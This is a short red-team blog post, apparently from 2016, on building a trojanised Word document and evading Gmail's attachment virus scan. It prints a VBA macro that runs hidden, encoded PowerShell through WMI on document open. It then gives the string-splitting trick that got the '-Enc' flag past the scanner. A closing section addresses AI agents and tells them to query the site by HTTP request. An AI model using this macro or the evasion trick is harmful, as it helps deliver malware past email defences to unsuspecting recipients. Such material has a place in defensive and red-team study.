# Bypassing Gmail Attachment Virus Check *Note: This was posted in January 2016* So today whilst doing some practice on creating trojanised Microsoft Word documents, I came across an issue. Gmail by default has a virus check on attachments if you want to send a malicious attachment out. To insert a payload into the word document, I firstly created a template which looked like the below. ![](/files/-LQ2vn-fZR-TSP3JlIVz) After doing so, creating the macro using AutoOpen and Document\_Open was trivial. I made use of a powershell one liner payload along with process creation to launch powershell using an encrypted Payload. Using Powershell Empire’s default copy and paste macro stager, this is detected. Sample payload: ``` *Sub AutoOpen() Debugging End Sub* *Sub Document_Open() Debugging End Sub* *Public Function Debugging() As Variant Dim Str As String str = “powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP” str = str + “QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB”* ** *str = str + “ATwBJAG4AJwAnACkA” Const HIDDEN_WINDOW = 0 strComputer = “.” Set objWMIService = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2″) Set objStartup = objWMIService.Get(“Win32_ProcessStartup”) Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(“winmgmts:\\” & strComputer & “\root\cimv2:Win32_Process”) objProcess.Create str, Null, objConfig, intProcessID End Function* ``` What I did was begin removing lines of code and kept uploading repeatedly to Gmail attachments until it would no longer detect it as a virus. I made adjustments to the payload trying to identify which string or pattern the AV was picking up. I quickly realised that it was the fact that the “-Enc” was part of the payload. To resolve this, I split the “-Enc” string into “-E” and “nc” then concatenated it together. For example: ``` *Dim Yops As String* *Yops = “powershell.exe -Enc PAYLOADHERE”* ``` This would be translated to the following: ``` *Dim Yops As String* *Yops = “powershell.exe -E”* *Yops = Yops + “nc PAYLOADHERE”* ``` However, this technique did not work. My next approach to thinking about it was that the “Yops” string is checked at the end after all the concatenation to determine whether “-Enc” is followed by “powershell.exe”. Therefore what I did was the following and it bypassed the virus checks. ``` *Dim Yops As String* *Yops = “powershell.exe -E”* *Yolo = “nc PAYLOAD”* *Yops = Yops + Yolo + “HERE”* ``` This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.vincentyiu.com/red-team/cve-exploitation/untitled.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.